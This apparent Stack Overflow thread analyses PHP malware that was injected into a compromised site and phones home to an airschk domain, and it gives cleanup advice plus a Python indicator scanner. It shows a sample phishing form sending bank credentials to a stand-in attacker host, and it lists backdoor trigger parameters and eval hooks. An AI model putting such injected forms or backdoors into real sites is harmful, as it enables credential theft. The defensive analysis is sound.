Hackers have added content to my PHP files

Question

My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.

Every file now starts with:

GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{

Full addition here

The database seems to be fine, so I am curious, what is the likely path of entry to be able to edit my files?

Accepted answer

You're not the first to be hit by airschk.

The exploit is based around a POST request with a variable prgetxr being set.

If it isn't set (and likely, in normal use of the site, it won't be) it cycles through that IP hash-map mynetsxx and if it finds that the requesting IP is in the network that matches this (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), and if it is, it calls rewrioutclbkxxx. You can manually request that function call by sending a GET request where a GET variable showmeallpls is true.

rewrioutclbkxxx is passed through output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing its thing.

Beware: the following may be a malicious domain; don't go there unless you know what you're doing.

It's going to pull data from hxxp://airschk.com/clk (I've censored the HTTP in that URL), it wants to get a bunch of data, so it sends a string that contains: user-agent (ie, the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1 which is likely something they've set up to identify your server.

So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.

EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.

Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com, but the URL tries to jack up google page rank for the URL (Blackhat SEO, you can get banned from google for this, but in the short-term they get more hits).

  1. A bunch of your user data is being sent to the criminals at airschk.
  2. They're sending back whatever the hell they want, and it has nearly unlimited power to screw you (and it's customized to each user if they want).
  3. They try to boost your google rank in ways that get you perma-banned from google.
  4. Back doors to check are POST requests of prgetxr and GET requests of showmeallpls.

Example of what they might do

Since they can edit the output stream of your files on-demand and know the user-agent as well as IP address they probably can track your users. Let's say you're a bank, and this is your login HTML:

<form method="post" action="./login.php">
    <input name="BankAccountNumber" />
    <input name="Password" />
</form>

Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:

<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
    <input name="CreditCardNumber" />
    <input name="SocialSecurityNumber" />
    <input name="FullName" />
    <input name="DateOfBirth" />
    <input name="HomeAddress" />

    <input name="BankAccountNumber" />
    <input name="Password" />
    <input name="prgetxr" />
</form>

How to prevent this.

Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.

Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system because more exploits could be anywhere. Nuke the damn thing and install a backup.

Next, set chmod settings so these files cannot be edited by anyone other than an account that is NOT the web-account. You need to understand unix security.

Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.

A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours, they can just move elsewhere, and likely have by now.

I can't tell about the path of attack they took to do this, so that's a whole different investigation and not really a question for SO.

Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.
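As an added example (not code from the original question or answer), here is a Python scan for the indicators the answer names: the injected identifiers ($wehaveitagain, mynetsxx, rewrioutclbkxxx), the airschk.com call-home domain, eval() and ob_start() callback hooks in PHP files, and the prgetxr / showmeallpls trigger parameters in web server access logs. The PHP snippet and log lines below are constructed to mirror the answer's description, not captured from a real server.

```python
import re
from pathlib import Path
# Identifiers, call-home domain and hooks (eval, ob_start callback) the answer describes.
SOURCE_MARKERS = {
    "wehaveitagain": re.compile(r"\$wehaveitagain\b"),
    "mynetsxx": re.compile(r"\bmynetsxx\b"),
    "rewrioutclbkxxx": re.compile(r"\brewrioutclbkxxx\b"),
    "airschk.com": re.compile(r"airschk\.com", re.IGNORECASE),
    "eval()": re.compile(r"\beval\s*\("),
    "ob_start(callback)": re.compile(r"\bob_start\s*\(\s*['\"$]"),
}
# The two trigger parameters the answer says to check (its item 4).
TRIGGER_PARAMS = ("prgetxr", "showmeallpls")
# Method and request target from a combined-format access log line.
REQ_RE = re.compile(r'"(GET|POST) (\S+)')

def scan_php_source(text):
    """Return [(line_no, marker)] for every marker hit in one PHP file's text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        hits.extend((no, name) for name, rx in SOURCE_MARKERS.items() if rx.search(line))
    return hits

def scan_webroot(root):
    """Map each .php file under root that has at least one hit to its hit list."""
    found = {str(p): scan_php_source(p.read_text(errors="replace"))
             for p in Path(root).rglob("*.php")}
    return {path: hits for path, hits in found.items() if hits}

def scan_access_log(lines):
    """Return [(line_no, param)] for requests whose query string names a trigger.
    POST bodies are not logged, so a prgetxr sent only in the body will not appear."""
    hits = []
    for no, line in enumerate(lines, 1):
        if m := REQ_RE.search(line):
            query = m.group(2).partition("?")[2]
            params = {kv.split("=", 1)[0] for kv in query.split("&") if kv}
            hits.extend((no, p) for p in TRIGGER_PARAMS if p in params)
    return hits

# Constructed sample data mirroring the answer's description (not from a real server).
SAMPLE_PHP = ("<?php\nGLOBAL $wehaveitagain;\nif($wehaveitagain != 1)\n{\n"
              "  ob_start('rewrioutclbkxxx');\n  eval($remote);\n}\n")
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2012:10:00:01 +0000] "GET /index.php?showmeallpls=1 HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2012:10:00:02 +0000] "POST /login.php?prgetxr=x HTTP/1.1" 302 0',
]
```

Run scan_webroot("/var/www") (path is an assumption) on a copy of the compromised tree and scan_access_log(open("access.log")) to see which files carry the prologue and when the triggers were requested.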
